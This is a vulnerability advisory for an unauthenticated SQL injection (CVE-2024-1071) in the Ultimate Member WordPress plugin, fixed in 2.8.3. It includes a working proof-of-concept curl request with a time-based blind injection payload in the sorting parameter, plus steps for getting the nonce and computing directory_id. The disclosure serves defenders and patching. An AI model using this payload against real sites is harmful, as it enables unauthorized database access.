Ultimate Member 2.1.3 – 2.8.2 – Unauthenticated SQL Injection | CVE 2024-1071 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape the sorting parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks when the "Enable custom table for usermeta" option is enabled.

Proof of Concept

Requirement: "Enable custom table for usermeta" option to be enabled (Ultimate Member > Settings > Misc)

As unauthenticated, retrieve the nonce from the source of the homepage by searching for var um_scripts. Then run the below cURL command and note the 5s delay from the response:

curl -X POST --data 'action=um_get_members&nonce=<NONCE>&directory_id=b9238&sorting=ID%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)' https://example.com/wp-admin/admin-ajax.php

PS: The directory_id calculated via "SUBSTRING( MD5( POST_ID ), 11, 5)" and in the example above, this is for POST_ID=1

Affects Plugins

ultimate-member

Fixed in 2.8.3

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/005fa621-3c49-4c23-add5-d6b7a9110055

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Christiaan Swiers

Verified

Yes

WPVDB ID

dcca7ed0-b088-4b7d-9e22-07b858367975

Timeline

Publicly Published

2024-02-23 (about 2 years ago)

Added

2024-02-26 (about 2 years ago)

Last Updated

2024-02-26 (about 2 years ago)

Other

Published

Title

Published

2025-02-19

Title

LTL Freight Quotes – GlobalTranz Edition < 2.3.12 - Unauthenticated SQL Injection

Published

2025-08-27

Title

Simple Download Monitor < 3.9.34 - Simple Download Monitor < 3.9.34 – Authenticated (Contributor+) SQL Injection via order parameter in Log Export functionality

Published

2025-02-14

Title

WP Airbnb Review Slider < 4.0 - Authenticated (Administrator+) SQL Injection

Published

2014-08-01

Title

WP-AutoYoutube <= 0.1 - Blind SQL Injection

Published

2025-02-20

Title

Ultimate Member < 2.10.0 - Authenticated SQL Injection